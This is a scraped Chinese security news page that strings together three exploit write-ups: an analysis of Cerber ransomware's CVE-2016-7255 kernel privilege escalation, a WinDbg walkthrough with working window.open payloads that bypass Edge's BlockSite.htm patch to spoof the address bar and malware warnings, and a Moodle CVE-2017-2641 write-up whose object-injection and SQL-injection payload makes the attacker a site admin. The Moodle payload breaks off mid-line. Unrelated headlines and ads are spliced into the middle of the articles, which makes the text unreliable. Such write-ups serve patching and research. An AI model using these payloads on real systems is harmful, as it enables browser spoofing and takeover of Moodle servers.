“cerber”敲诈者对CVE-2016-7255漏洞利用分析

0x1前言
360互联网安全中心近日捕获到一款“ceber”敲诈者木马变种,该变种与其他“ceber”敲诈者木马变种在代码执行流程上并没有太大区别。唯一值得注意的是,该木马利用CVE-2016-7255权限提升漏洞对自身进行提权。本文将分析该敲诈者对CVE-2016-7255权限提升漏洞的利用过程。

NBA多队将更换球馆 你知道这背后的商业秘密吗?

0x2漏洞细节
出问题的代码位于win32k!xxxNextWindow中,由于缺少必要的检查直接将tagWND+0xC0成员偏移0x28对应地址中的值与4进行或操作,而tagWND+0xC0又是可控的,从而导致了任意地址写。存在漏洞的代码如下所示。
图1 存在漏洞的代码
图中v12表示的就是tagWND结构体,该结构体如下所示(省略掉部分)。
图2 tagWND结构体
从上图可以看出,tagWND+0xC0对应的是spmenu成员,如果存在用户态函数可以对该成员进行赋值,即可触发任意地址写。对于32位系统而言,可以直接调用SetWindowLong函数,SetWindowLong函数会调用内核态函数NtUserSetWindowLong完成此功能;对于64位系统而言,不存在可以利用的用户态函数,但是可以使用syscall的方式调用内核态函数NtUserSetWindowLong或函数NtUserSetWindowLongPtr来完成这项工作。(以下介绍的是NtUserSetWindowLong函数,NtUserSetWindowLongPtr函数执行流程相同)。
NtUserSetWindowLong函数只是一层外壳,它会将参数传递给xxxSetWindowLong并调用它,该函数如下所示。
图3 xxxSetWindowLong函数
在该函数中会对传入的nIndex进行判断,并根据nIndex的值执行对应的操作。对于nIndex的值为-16,-20,-12,-21的情况,会调用xxxSetWindowData函数进行处理。如下所示。
图4 调用xxxSetWindowData函数进行处理

唐山:路南全方位引导提升农民工法律和安全意识

该函数接收xxxSetWindowLong的参数,当nIndex参数为-12(GWL_ID),且所操作窗口的style为WS_CHILD或WS_CHILDWINDOW(0x40000000)时,会将所操作窗口tagWND结构体的spmenu成员的值设为dwNewLong。如下图所示。
图5 触发漏洞的位置
由于dwNewLong是调用NtUserSetWindowLong函数时传递的参数,用户态进程可以利用syscall随意控制它。而win32k!xxxNextWindow函数会对spmenu+0x28的成员与4进行或操作,因此触发了任意地址写。

0x3漏洞利用分析
从漏洞细节中可以看出,用户态进程拥有对tagWND结构体的spmenu成员的修改权,该成员是个tagMENU结构体,结构体定义如下所示。
图6 tagMENU结构体
不难看出,xxxNextWindow函数修改的值就是spmenu的fFlags成员(偏移0x28),由于对该成员进行与0x4的或操作,因此该漏洞只能修改1bit大小的区域。
只能修改1bit表面上看起来貌似没有多大价值,不过该木马变种并非只把目光集中在这1bit上,而是转移到了tagWND结构体的cbWNDExtra成员,该成员表示的是窗口附加数据的大小。如果能够通过修改窗口附加数据的大小来覆盖关键地址,之后再利用其他方式写入数据,就可达到完美利用。
那么要完成对cbWNDExtra成员的写操作,就必须获取cbWNDExtra成员的地址或者是cbWNDExtra成员相对于某个已知地址的偏移。除外还必须获取附加数据的地址或者是相对于某个已知地址的偏移,以便之后进行计算与写入。对于获取cbWNDExtra成员的地址,该木马创建了两个窗口“ExtraWnd1”和“ExtraWND2”,而这两个窗口的不同之处在于其窗口类的cbWndExtra成员,该成员正好对应tagWND的 cbWNDExtra成员。程序将两个窗口类的cbWndExtra成员分别赋值为0x118和0x130,如下图所示。
图7 创建两个窗口
创建窗口之后就是获取cbWNDExtra成员在tagWND结构体中的偏移,使用的是HMValidateHandle函数。该函数并未在用户态中导出,不过有个用户态函数IsMenu调用了它。木马通过判断IsMenu中相关字节码的位置获取HMValidateHandle的地址。
图8 利用字节码定位函数

HMValidateHandle函数会泄露tagWND结构体的内容,因此木马很容易就能定位cbWNDExtra成员在tagWND结构体中的偏移。为了保险起见,木马判断两个窗口tagWND结构体的cbWNDExtra成员的偏移,当两个cbWNDExtra为注册窗口类时设置的值(0x118和0x130)且偏移相同时才说明该偏移有效。
图9 确定cbWndExtra成员的偏移
在获取cbWNDExtra成员的偏移之后,该获取附加数据的偏移了。附加数据在内核态中是紧跟在tagWND结构体之后的,而SetWindowLong函数可以向窗口写入附加数据,nIndex表示的是写入的初始偏移。该木马调用SetWindowLong函数向附加数据区域的开头写入0x31323334,之后再次调用HMValidateHandle函数并通过比较偏移的内容是否为0x31323334来确定附加数据的偏移。
图10 确定附加数据的偏移
确定关键的两处偏移之后,就该进行漏洞的触发了。由于触发漏洞的窗口必须设置为WS_CHILD或WS_CHILDWINDOW(0x40000000)类型。因此此处调用SetWindowLong函数设置窗口的style。
图11 设置窗口style
然后就是对tagWND结构体的spmenu成员赋值,此时调用的是以GWL_ID做为nIndex参数的NtUserSetWindowLong函数(或NtUserSetWindowLongPtr函数)。该木马会首先确定程序所处的系统环境,如果是32位系统则直接调用SetWindowLong函数完成工作;如果是64位系统,则在用户态中使用syscall并赋予特殊的ID调用NtUserSetWindowLongPtr函数。32位系统环境下和64位系统环境下调用方式如图所示。
图12 32位系统下通过调用SetWindowLong函数调用NtUserSetWindowLong
图13 64位系统使用syscall方式调用NtUserSetWindowLongPtr函数
本文以64位系统为例,syscall ID在不同版本中各不相同,木马在执行漏洞利用之前会先判断操作系统版本并初始化存放不同操作系统版本syscall ID的数组。在Win7 x64下,该ID为0x133a。
图14 判断系统版本并初始化syscall ID
之前已经获得cbWNDExtra成员在tagWND结构体中的偏移,现在需要获得所操作窗口的tagWND结构体在内核中的地址。幸运的是,tagWND.head.pSelf成员(head成员偏移0x20处)泄露了tagWND结构体在内核中的地址,可以首先通过HMValidateHandle函数获取tagWND结构体的内容进而获取tagWND.head.pSelf成员,从而取得tagWND结构体在内核中的地址。之后对tagWND结构体成员内核地址的获取都是先使用该方法获取tagWND结构体的内核地址再加上相应的偏移。
图15 获取tagWND地址
tagWND的地址加上cbWNDExtra成员的偏移即可得cbWNDExtra成员在内核中的地址。由于xxxNextWindow函数操作的是spmenu成员中的值加上0x28后的结果,而木马的目的是修改cbWNDExtra的值,因此木马将cbWNDExtra成员(大小为4字节)在内核中的地址减去0x28后加上3字节,将该值传递给spmenu,让cbWNDExtra的最高字节与0x4进行或操作。这样原本大小为0的cbWNDExtra就变成了0x4000000。此时窗口的附加数据长度就变为了0x4000000。
完成附加数据长度的增长之后,需要往附加数据中写入特定的值以寻求覆盖一些关键的标志位达到权限提升。该木马使用的方法是再次创建一个窗口,并确保该窗口的tagWND的地址与触发漏洞的窗口的tagWND的地址距离足够小,以保证触发漏洞的窗口的附加数据可以覆盖到该窗口的tagWND。为此,木马在完成该步骤之前创建了100个窗口,并选取两个tagWND结构体地址相差小于0x3fd00的窗口,一个作为触发漏洞的窗口,一个作为利用的窗口。
图16 创建两个窗口进行漏洞触发和利用
选取好两个窗口之后调用xxxNextWindow函数触发漏洞。在用户态中可以模拟按键VK_MENU来触发xxxNextWindow函数的调用。漏洞触发后,窗口1的附加数据长度变为0x4000000,覆盖了窗口2的tagWND结构体。
图17 模拟VK_MENU触发xxxNextWindow函数的调用
木马利用该漏洞的目的是提升权限,因此木马必须对一些重要的标志位,例如进程令牌进行修改。幸运的是,通过检索tagWND结构体的一些成员就能找到可以进行操作的地方。TagWND.head.pti -> ppi -> Process-> ActiveProcessLinks保存所有进程的EPROCESS对象,木马可以通过检索这些对象获得系统高权限进程的相关信息。
那么木马该如何获得这些信息?由于窗口1的附加数据覆盖了窗口2的tagWND结构体,而且可以调用NtUserSetWindowLongPtr函数(32位下可以调用SetWindowLong函数)对窗口的附加数据进行写操作,这意味着可以操作窗口2的tagWND结构体。如果将某个内核地址写入窗口2的tagWND结构体中的某个成员,再利用其它函数读取该成员的值,就能够读取该内核地址中的值。木马选取的是tagWND的spwndParent成员。该成员偏移为0x58。

麻阳县开展水电站安全知识培训

图18 利用spwndParent任意读
木马通过syscall调用NtUserSetWindowLongPtr函数写窗口1的附加数据,而数据操作的起始偏移为窗口2tagWND. spwndParent的内核地址-窗口1附加数据区的起始地址,也就是窗口1附加数据覆盖到窗口2 tagWND结构体spwndParent成员的位置。木马将之前提到的ActiveProcessLinks链表的内核地址写入窗口2 tagWND结构体的spwndParent成员。然后调用GetAncestor函数,该函数实际调用内核态函数NtUserGetAncestor,当gaFlags参数为GA_PARENT(1)时,该函数将读取tagWND结构体的spwndParent成员。
图19 gaFlags参数为1时读取的值
如此一来,木马就能够读取ActiveProcessLinks链表的内核地址,并且可以遍历该链表获取其它进程的EPROCESS对象。木马遍历ActiveProcessLinks链表中每个进程的PID,以获得当前进程的EPROCESS对象。
图20 获得当前进程的EPROCESS对象之后还会继续遍历链表,获得system进程(PID=4)的EPROCESS对象。
图21 获得system进程的EPROCESS对象
然后木马读取system进程EPROCESS对象偏移0x208的值,也就是token成员,同时也获取当前进程的token成员的内核地址。之后它将用system进程的token替换掉当前进程的token,以达到提权的目的。
被黑了,黑回去的想法如何?
新蠕虫将电脑变成比特币矿工,计算资源有限,写些电脑蠕虫,让受感染的电脑帮忙挖矿赚钱,还算文明的了,如果平时有教育用户留心电脑性能异常,比如速度变慢可能是中了病毒,则可以帮忙消除。
图22 读取system进程EPROCESS对象的token成员
图23 读取当前进程EPROCESS对象的token成员
在完成必要的读取操作之后,木马需要将token写入当前进程的EPROCESS对象的相应偏移中,而对于写操作,木马选择了SetWindowText函数。SetWindowText函数会将数据写入tagWND.strname.Buffer,如果可以将tagWND.strname.Buffer修改为当前进程token的内核地址,就可以对当前进程的token进行修改。和之前的原理一样,可以利用syscall调用NtUserSetWindowLongPtr,通过写入数据到窗口1的附加数据区域以覆盖窗口2的tagWND.strname.Buffer成员,即可修改窗口2的tagWND.strname.Buffer为当前进程EPROCESS对象的token成员的内核地址。
图24 获取tagWND.strname.Buffer
之后调用SetWindowText将system进程的token写入到tagWND.strname.Buffer的地址中,也就是用system进程的token代替当前进程的token,从而使当前进程拥有system权限。至此进程提权成功。
图25 cerber敲诈者木马提权成功
0x4缓解机制
通过微软的补丁可以发现,在对win32k!xxxNextWindow的调用时进行了限制。如下图所示。
图26 缓解机制
在对spmenu.fFlags进行或操作之前会首先判断tagWND的style成员是否为WS_CHILD或WS_CHILDWINDOW(0x40000000),也就是所操作窗口的类型是否为WS_CHILD或WS_CHILDWINDOW,如果窗口类型为WS_CHILD或WS_CHILDWINDOW则跳过此处的操作,不会对spmenu.fFlags进行或操作。由于调用以GWL_ID做为nIndex参数的NtUserSetWindowLongPtr函数的时候,只有当所操作的窗口类型为WS_CHILD或WS_CHILDWINDOW(0x40000000)的情况下才会将dwNewLong参数中的值赋予tagWND.spmenu(见图5),而此处限制了窗口的类型,从而对整个漏洞触发的过程进行了限制。

0x5总结
如今越来越多的恶意程序使用nDay漏洞进行攻击或者辅助自身的攻击,而对此最好的解决方法就是及时打上补丁以阻止恶意攻击。对于用户而言,提高安全意识,不运行安全性未知的程序,为系统及时打上补丁,这些对于防范恶意程序攻击都是非常有必要的。

微信扫一扫关注该公众号

软件厂商如微软等从未通过电子邮件发送补丁或更新,而且没有例外情形。记住这一点,你才不会成为软件补丁骗局的受害者。如果收到这些诈骗邮件,请及时通知您的安全紧急事件响应团队,他们会采取相应的措施。

猜您喜欢

一个信息安全动画小故事,随意丢弃损毁的U盘,被保洁员拾走,泄了密……
社交网络的广泛应用引发强烈安全顾虑
信息安全宣传活动策划案
专访华为余承东:P10销量要破1000万赶超苹果
COMANDAMEA ZAZZLE
如何让员工发挥信息安全正能量

绕过补丁实现欺骗地址栏和恶意软件警告

微软推送了一个大规模更新。本次更新修复了众多的安全漏洞,包括来自本网站的大部分。这是一个巨大的荣誉,一个属于Edge开发者们及负责该安全的开发者的荣誉。对于那些依然维持 IE 浏览器策略的开发者,我觉得至少要公开地表态为什么不继续维护IE了。要么让它停更,要么继续维护。
快速回顾
微软Edge允许加载一些内部资源包括类似acr_error.htm的html网页,不过不允许BlockSite.htm的加载。为何呢?这是因为后者很容易被用于欺骗内部恶意软件警告和地址栏。前几个月,我们通过把URL中的一个点改为对应的转义来绕过该限制,现在这个被打上补丁了。Edge开发者在检查字符串输入之前解码恶意URL,所以得找其他的方法了。加把劲!关掉那烦人的facebook消息栏,别在其他地方让费时间了。统统都关掉吧,让我们沉浸在有趣的二进制的海洋吧!
没有标记
到目前为止,微软公司并没有上传太多的公开标记,所以我们的分析不可能像上周(当时标记已经公开)一样正当。不过,也别担心,我们只是尝试绕过补丁而已,请在心里铭记攻击者的心态:我们只是想绕过补丁,仅此而已。我想,攻击者难道会说先休息一个星期吧,等微软公开它的标志。
寻找“blocksite.htm”
我们知道,在Edge浏览器成千上万行代码里,肯定有一个比较字符串来阻止“blocksite.htm”加载,因此我们将依靠Edge定位到该字符串并通过设置内存访问断点来监测它的读取。

补丁失效!关键Apache Struts漏洞仍被大量利用

下面的Javascript调用ACCESS_DENIED不过并未开启一个新窗口:
window.open(“ms-appx-web://microsoft.microsoftedge/assets/errorpages/BlockSite.htm”);
这个内部URL被Edge屏蔽,因为,这个特别的错误页面能接收哈希值查询语句,这将使攻击者实现地址栏和页面内容欺骗。
我们的目标是打开那个URL再次欺骗Edge。为此,要实现这个目标,我们将使用下面的URL(末尾处的点和‘faceboook’编码使我们可以在内存中检查我们的字符串):
window.open(“ms-appx-web://microsoft.microsoftedge/assets/errorpages/BlockSite%2ehtm?BlockedDomain=facebook.com”);
我们链接到Edge去查找BlockSite.htm。首先,将搜索范围限定在大多数代码汇集的EdgeHtml.dll模块。这仅仅是个猜测,如果我们在这里什么都没找到,那么我们将查找其他模块甚至所有的Edge文件。
一旦链接到正确的Edge浏览器进程,我们需要了该模块的起始结束地址,这样我们才能确定在内存的搜索范围。
0:029>lmmedgehtml
Browsefullmodulelist
startendmodulename
00007fff`54ba000000007fff`5614d000edgehtml
现在我们可以为搜索命令提供地址范围和要搜索的字符串了。WinDbg的语法实在是吓人的,不过我可以告诉你下面的指令是在那些难以阅读的64位地址间搜索‘s’并返回Unicode字符u的【1】地址。

0:029>s-[1]u00007fff`54ba000000007fff`5614d000″BlockSite”
0x00007fff`55d90846
0x00007fff`55d90944
0x00007fff`55e52c02
好的,WinDbg迅速返回三个地址,我们看看是否正确的。Du du du,像是Dudú——我的朋友,昵称叫“Dudú”。
0:029>du0x00007fff`55d90846;du0x00007fff`55d90944;du0x00007fff`55e52c02
00007fff`55d90846″BlockSite.htm”
00007fff`55d90944″BlockSite.htm”
00007fff`55e52c02″BlockSite.htm”
我瞬时激动了。我们想找出该字符串的访问者,因此在这三个地址上都设置了断点。
bar10x00007fff`55d90846
bar10x00007fff`55d90944
bar10x00007fff`55e52c02
g(keeprunning,Edge!)
好极了!接着转到Javascript代码试着打开我们的恶意链接。
window.open(“ms-appx-web://microsoft.microsoftedge/assets/errorpages/BlockSite%2ehtm?BlockedDomain=facebook.com”);
哇!极速断点,返回到WinDbg,看看返回的结果:
Breakpoint0hit
KERNELBASE!lstrlenW+0x18:
00007fff`74f6e2c875f6jneKERNELBASE!lstrlenW+0x10(00007fff`74f6e2c0)[br=1]
从这看来我们在kernelbase模块,不过我们的目的是找到与字符串相关的EdgeHtml模块。我们去看一下最近的5次栈跟踪调用。
0:013>k5
#Child-SPRetAddrCallSite
00000000d3`14df8de800007fff`74f70244KERNELBASE!lstrlenW+0x18

Struts2 S2-045漏洞补丁有绕过?S2-046来袭 创宇盾可防御

01000000d3`14df8df000007fff`54fee629KERNELBASE!StrStrIW+0x54
02.000000d3`14df8eb000007fff`55004e6bedgehtml!Ordinal107+0xc6059
03000000d3`14df9f5000007fff`55007272edgehtml!Ordinal107+0xdc89b
04000000d3`14df9f8000007fff`55004caeedgehtml!Ordinal107+0xdeca2
前两个属于kennelbase模块,接下来的这个来自edgehtml。更清楚规范地讲,一段edgehtml的代码调用了kennelbase模块库的的StrStrIW函数。通过谷歌搜索,我们在MSDN上找到了StrStrIW函数的说明文档:
文档非常讲得非常清楚,多亏了栈跟踪,我们得以知道edgehtml调用的是这个函数。我们在返回地址之前设置断点,这样我们就可以分析在这之前的代码了(顺便提一下,也可以通过两次分步执行达到同样的效果,不妨试试)。
bpedgehtml!Ordinal107+0xc6059
g
砰!立即到了断点。
Breakpoint3hit
edgehtml!Ordinal107+0xc6059:
00007fff`54fee6294885c0testrax,rax
我们刚从字符串的比较中返回,因此我们看看稍前时间发生了什么。在WinDbg下,我们可以很容易地反汇编:
移动互联网越来越普及,移动应用和移动终端也越来越多,我们像对待电脑一样对待移动智能设备,要求它们符合基本的终端安全要求,比如数据加密等等,因为万一这些设备失窃,由于数据丢失而带来的损失要远远高于设备本身的价值。
0:013>ub$ip
edgehtml!Ordinal107+0xc602d:
00007fff`54fee5fdleardx,[edgehtml!Ordinal138+0x3e4ff8(00007fff`55d5e6b8)]
00007fff`54fee604learcx,[rsp+30h]
00007fff`54fee609callqwordptr[edgehtml!Ordinal138+0x38b5b8(00007fff`55d04c78)]
00007fff`54fee60ftesteax,eax
00007fff`54fee611jneedgehtml!Ordinal107+0xc6108(00007fff`54fee6d8)
00007fff`54fee617leardx,[edgehtml!Ordinal138+0x417160](SecondArgument)
00007fff`54fee61elearcx,[rsp+30h](FirstArgument)
00007fff`54fee623callqwordptr[edgehtml!Ordinal138+0x38b5c8]
干得真棒!不过,由于字符问题,这些东西有点难看。也别太在意,我们知道,这是从上面的调用(最近的这条)返回,是吧?而且,在调用之前,传递了两个参数,一个在rdx,另一个在rcx(这两个都是指令)。由于调用已经执行,其中的值可能改变了,所以无法得知其中的具体情况。接下来,我们通过在最后一次的调用(还未执行)之前设置断点来更进一步地检查该值:
bd(disablepreviousbreakpoints)
bp00007fff`54fee623
同程旅游A轮投资大唐国际商旅 战略布局TMC板块
g
现在我们可以在它比较之前看个究竟。运行Javascript:
window.open(“ms-appx-web://microsoft.microsoftedge/assets/errorpages/BlockSite%2ehtm?BlockedDomain=facebook.com”);
断点恰好在执行比较前启动了:
Breakpoint4hit
edgehtml!Ordinal107+0xc6053:
00007fff`54fee623callqwordptr[edgehtml!Ordinal138+0x38b5c8]ds:00007fff`55d04c88={KERNELBASE!StrStrIW(00007fff`74f701f0)}
我们检查一下传递给 StrStrl 函数的参数:
0:013>[email protected](Firstargument)
000000d3`14df8ee0″ms-appx-web://microsoft.microsof”
000000d3`14df8f20″tedge/assets/errorpages/BlockSit”
000000d3`14df8f60″e.htm?BlockedDomain=facebook.com”

0:013>[email protected](Secondargument)
00007fff`55d90820″/assets/errorPages/BlockSite.htm”
哦!看,我构造的 %2e 已经被解码成点了。这表明 Edge 调用 StrStrl
函数,然后检查 URL 中是否存在“/assets/errorPages/BlockSite.htm”。下面的的pseudoCode 就是我所坚信的:
记住,我们这是在推断,这很重要。因为实际中是不可能在比较之后再检查的。不过,目前我们正需要进行比较,所以希望它快点进行。对此,我们并不是特别关心,只要可以用相同的技术再次绕过就行。
Varurl=”ms-appx-web://microsoft.microsoftedge/assets/errorpages/BlockSite.htm?BlockedDomain=facebook.com”;
varbadString=”/assets/errorPages/BlockSite.htm”;
if(badStringisinsideURL)ACCESS_DENIED;
现在主要的问题是浏览器会阻止硬编码的字符串尽管 URL 可以写成多种不同的形式。先前的方法是编码进一个点,现在我们要解码并且已经确切地了解了字符串比较的过程,所以需要新的方法。我想到很多主意比如,多重编码,在 URL 中插入斜杠等。我们试试在 URL 中插入斜杠来欺骗字符串检查,希望是有效的输入。正如在错误页面插入破折号:
window.open(“ms-appx-web://microsoft.microsoftedge/assets/errorpages//BlockSite.htm?BlockedDomain=facebook.com”);
哇!看,简单的双斜杠就绕过了补丁,同时,还能加载URL。现在,我们构造一个更好的查询字符串来完全欺骗恶意报警页面,就像我们之前那样:
window.open(“ms-appx-web://microsoft.microsoftedge/assets/errorpages//BlockSite.htm?BlockedDomain=facebook.com&Host=TheseguysatFacebookandinparticular,JustinRogers#http://www.facebook.com”);
本文由 看雪翻译小组 StrokMitream编译,[email protected]

苹果紧急发布OS X安全补丁:有重大漏洞 不得不升!

热 门 阅 读:
《走进企业看安全.易宝支付》第9站 报名倒计时!
AutoIt 脚本反混淆
攻击 Western Digital NAS 个人云存储设备
渗透测试 Node.js 应用
UPDATE 查询中的 SQL 注入
……
更多优秀文章点击左下角阅读原文查看!
看雪论坛:http://bbs.pediy.com
微信公众号 ID:ikanxue
微博:看雪安全
投稿、合作:www.kanxue.com
该文章作者已设置需关注才可以留言
微信扫一扫关注该公众号

制定移动安全策略不需太细节,高屋建瓴地指明方向即可,如何提升员工的信息安全意识呢?

猜您喜欢

一分钟的信息安全意识动画片,轻松演绎企业信息安全基础知识。
敏感信息保护案例视频——拍照泄密
信息安全爱好者特别是无线网络渗透测试人员、白帽黑客、安卓和苹果应用开发者,如何通过移动设备来控制他人呢?
城会玩!女子实力证明跑步机“不无聊”
OZZGAMES XIFANGSHIBAI
关于昆明亭长朗然科技有限公司

【CVE-2017-2641】Moodle远程代码执行漏洞

0x01 概述
漏洞(CVE-2017-2641)允许攻击者在易受攻击的Moodle服务器上执行PHP代码。这个漏洞实际上由许多小漏洞组成,如文章中所述。
Moodle是一个非常受欢迎的学习管理系统,部署在世界各地的许多大学,包括麻省理工学院,斯坦福大学,剑桥大学和牛津大学等顶尖研究所。
Moodle存储了大量敏感信息,如成绩,测试和学生私人数据,使其成为一个重要的目标,这是我审计它的主要原因。
此漏洞适用于几乎所有部署的Moodle版本,如“受影响版本”部分所示。我建议所有Moodle的管理员应用安全补丁。
0x02 受影响版本
3.2〜3.2.1
3.1〜3.1.4
3.0〜3.0.8
2.7.0〜2.7.18及其他不受支持的版本
0x03 技术说明
第1部分-大部分代码存在问题
Moodle是一个非常大的系统,它包含数千个文件,数百个不同的组件和大约200万行的PHP代码。因此,显而易见的是,不同开发人员编写代码的不同部分,这些部分相互影响。
在下面的白皮书中,我将演示如何使用有漏洞的代码,其实主要原因是太多开发人员没有写文档导致的严重逻辑漏洞,几乎所有具有大量代码库的系统都可能会发生逻辑漏洞。
在系统的内置Ajax机制中可以看到一个明显的“相同特征,不同代码”的情况。
Moodle具有动态Ajax系统,允许不同的组件使用系统的内置Ajax接口。Moodle的方式是使用“External Functions”。使用内置Ajax机制的每个组件都注册自己的“External Functions”,指定被调用的组件,函数名称和使用它所需的权限。
当组件希望使用Ajax接口时,他们可以简单地调用“service.php”文件,提供它们之前注册的外部函数的名称。Moodle的这种方式允许组件开发者使用其内置的Ajax界面,这样可以为他们节省自己编写一个新组件的麻烦。

[鞍山]市公路管理处岫岩段组织养护作业安全培训

但是,当Moodle的核心开发人员开始使用这个接口时,问题就出现了。
如果有一个组件需要通过Ajax请求来更改用户的首选项,它就会调用“setuserpref.php”文件,指定要更改的属性的名称和值。这可以在以下代码中看到:
最近又发生多起电脑远程控制软件电信诈骗案件,诈骗手段花样翻新,虽然陌生人之间的信任关系依然很淡薄,但是仍然有不少倒霉蛋轻信了黑客。
在代码的中间,在突出显示的行中,我们可以看到Moodle正在尝试确保需要更改的首选项在“ajax_updatable_user_prefs”数组中的定义,该数组定义了哪些首选项可以通过Ajax更改。因为Moodle不希望像我们这样的恶意攻击者改变任何重要的地方。
虽然大多数用户即使不通过Ajax接口,首选项也可以通过其他措施更改,但是Moodle的开发人员试图提前预防,防止以后被滥用此机制。
直到添加了外部函数“update_user_preferences”。这个函数被添加来替换旧的“update_users”函数,这能够“potentially [be] used to update any user attribute”,这显然是一件非常糟糕的事情;由于旧功能仅用于更新用户的首选项,因此显然无需让其更改任何其他内容。
旧功能与新功能之间的主要区别在于,旧功能无法通过Ajax界面进行访问,而新的功能可能会因为所谓的危险功能而改变每个用户属性的功能。
最重要的是,他们实施了适当的权限检查,所以即使攻击者可以利用使用用户的优先权限,它只能在自己的用户身上利用它。
但是,这些preferences在稍后的“eval”或“exec”调用中使用并不重要,无论哪个用户正在利用危险的功能,只要它被利用。
让我们先看一下这个函数的代码:
public static function update_user_preferences($userid, …, $preferences) {
…}通过查看代码,我们可以看到,由于进行了preferences检查,我们只能编辑自己的首选项,但是,仍然缺少一些东西。虽然代码确保我们只能编辑我们自己的用户首选项,但它不检查我们改变哪个preferences,而与其他负责更改用户首选项的Ajax页面相反 – “setuserpref.php”。

公司互动:江龙船艇具有军工保密资质

一个典型的例子,如果不同的开发人员,在不同的时间,不同的需求,为不同的功能写入不同的代码。这一次,他们假设用户preferences不能以任何恶意的方式利用。他们认为这是不可利用的。
第2部分 -利用不可利用的
有一个原因,用户preferences被认为是不可利用的。它们在系统操作方面几乎没有任何影响 – 它们不能用于DB查询,它们不定义任何组件,它们唯一的影响是系统的GUI部分,甚至只有miner方式。
那么,我们要做什么呢?好了,我们先看看系统的GUI部分如何工作。
Moodle正在使用Blocks mechanism来允许组件向用户显示相关数据。这些块可以由用户添加和删除。
其中的一个块–“course_overview”用于向用户显示其已注册课程的列表。为了储存注册的课程顺序,课程概述块机制使用一个名为“course_overview_course_sortorder”的特定用户preference。此preference存储用户注册的所有课程ID的列表,并在其注册时排序。
此列表使用逗号分隔课程ID,因此以下代码行用于拆分列表:
return explode(‘,’, $value); // Split the IDs using a comma但如果preference是空的,会发生什么?在这种情况下,块机制尝试检索旧版首选项“course_overview_course_order”,其中已不同的方式再次包含所有课程ID的列表。
这次,为了检索到ID,块机制实际上执行:
$order = unserialize($value); // Unserialize the course IDs一个unserialize调用。
另一个典型的例子是遗留代码和向后兼容性如果仍然使用它会损害整个系统,以及不同开发人员如何使用完全不同的方法实现完全相同的功能。
对我们来说,这意味着我们现在可以利用Object注入攻击。因为Moodle是过滤用户输入的,这局限着我们注入的方式:
我们不能注入Null字节。在这意味着我们不能设置任何受保护的或私有的Object属性,因为当PHP序列化它们时,它们将空字节添加到它们的序列化声明中。
虽然在代码库中有很多类,但大多数是不可达的。当我们的有效载荷未经序列化时,或者使用自动加载功能无法访问时,它们不包括在内。
这些限制导致了一个非常困难的Object注入。
第3部分 – 从Object注入中获取乐趣
由于规定的限制,我们只能使用已经包含类的公共属性。我们也不能使用依赖于任何受保护或私有属性的任何代码,因为它们将被初始化为其默认值,或者大部分时间只是一个NULL。

国际妹 | 内鬼作祟 威胁医院信息安全

这缩小了我们的攻击面。几乎所有的类都以某种方式使用受保护的属性,并且它们中大多数没有任何公共属性。
第一步是了解我们可以使用哪些magic PHP :
我们可以调用“__wakeup()”,当object被反序列化时调用“__destruct()”,当object被销毁时调用 “__toString()” 。
在我们的有效负载被非串行化之后看到正在执行的代码,我们将看到我们的非序列化的有效负载被视为一个数组:
function block_course_overview_update_myorder($sortorder) {
set_user_preference(‘course_overview_course_sortorder’, $value);}此函数尝试将我们的非序列化数组成员加入一个大的字符串。但是,如果我们的一个成员实际上是一个Object,那么它的“__toString()”方法将被调用。
但是我们可以用“__toString()”做什么?
我们来看看”attribute_format“抽象类如何实现自己的“__toString()”方法。
看起来十分简单,我们最来看看我们可以访问的一个代码流,通过调用继承自“attribute_format”类的“feedback”类的“decision_format()”方法:
看到“is_overridable_item()”调用了吗?这是另一种方法调用,但这次使用object‘s的属性之一作为object。
现在,我们取得了一些进展。因为我们控制属性,我们控制被调用的object,就可以扩展我们的攻击面了。实现“is_overridable_item()”方法的类之一是“grade_item”类。
经过一系列方法调用,我们最终到达“update”方法。
可以看出,“update”方法负责使用存储在object中的数据来更新数据库。它使用属性“table”作为要更新的表名,数据直接来自object自己的属性。

所以,基本上,使用object注入,我们可以update整个数据库中的任何行。我们可以update管理员帐户,密码,站点配置,只要是我们想要的。
这里,我们可以update一些限制:
updateSQL语句总是以WHERE条件结束,并检查我们指定的ID。
我们不能在我们的数据中利用SQL注入。我们设置的值将被转义,并且我们要更新的字段将根据表的实际字段进行检查,因此我们不能使用任何不存在的字段。
只要我们知道要update的行ID,我们就可以update我们想要的所有内容。但是,我们不应该试图更改管理员的密码,或者需要猜测其用户ID,或者暴力破解数据库中的每个帐户。我们应该尽量减少对服务器的影响。
第4部分 – 1337 H4x0rs
我们不想更改系统中每个用户的密码。所以为了绕过,我们可以通过更改存储在“config”表中的“site_admins”配置值,将我们的用户添加为系统中的另一个管理员。
但是我们如何猜测表中的具体配置的ID呢?好吧,我们不能。但是我们可以尝试改变WHERE SQL语句。
为了做到这一点,我们需要使用一个SQL注入。由于我们不能利用任何数据字段,我们必须在表名称的本身中插入我们的SQL注入,而不是在任何地方转义。
但是,这提出了另一个问题 – 在执行UPDATE语句之前,Moodle正在向数据库查询指定表的列名和类型。
这意味着我们必须在SELECT语句和update语句上同时执行相同的SQL注入,SELECT语句应该返回表的正确数据,UPDATE语句应该update“site_admins”配置值。
我们来看看这两个语句:
SELECT column_name, data_type, character_maximum_length, numeric_precision,
WHERE table_name = ‘[TABLE_NAME]’ORDER BY ordinal_positionUPDATE [TABLE_NAME] SET [DATA] WHERE WHERE id='[ID]’很明显,我们在两个表中唯一的注入点是表名。
利用此SQL注入的一种方法是在我们update的表之后启动一个多行注释(/),并将其关闭在我们的一个数据参数中。这样我们的数据可以包含我们改变的WHERE语句,通过配置名称而不是它的ID过滤数据。所以,我们的有效载荷是这样的:
SELECT … WHERE table_name = ‘config’ /’
ORDER BY ordinal_position
UPDATE config’ / SET field=’/ SET value=our_user_id WHERE name=site_admins– WHERE id='[ID]’但是我们如何在表名中插入一个注释,使SELECT语句和UPDATE语句都可以正常工作?显然,UPDATE语句不会工作,因为在表名后面添加撇号的话,select语句将不工作,因为我们无法在SQL中关闭它时不打开多行注释。
如果我们将多行注释插入到我们的表名中而不关闭字符串,然后再继续使用另一个OR语句的WHERE条件会怎么样?我的意思是,这样的:
SELECT … WHERE table_name = ‘config /’ or table_name LIKE ‘%config’ORDER BY ordinal_positionUPDATE config /’ or table_name LIKE ‘%config SET field=’/ SET
无节操黑客为不良搜索公司蝇头小利而入侵其竞争对手并窃取商业机密
value=our_user_id WHERE name=site_admins– WHERE id='[ID]’虽然SELECT语句有许多self-explanatory,但UPDATE语句可能需要更多的explanation。试试以MySQL解析的方式显示它:
UPDATE config /’ or table_name LIKE ‘%config SET field=’/ SET
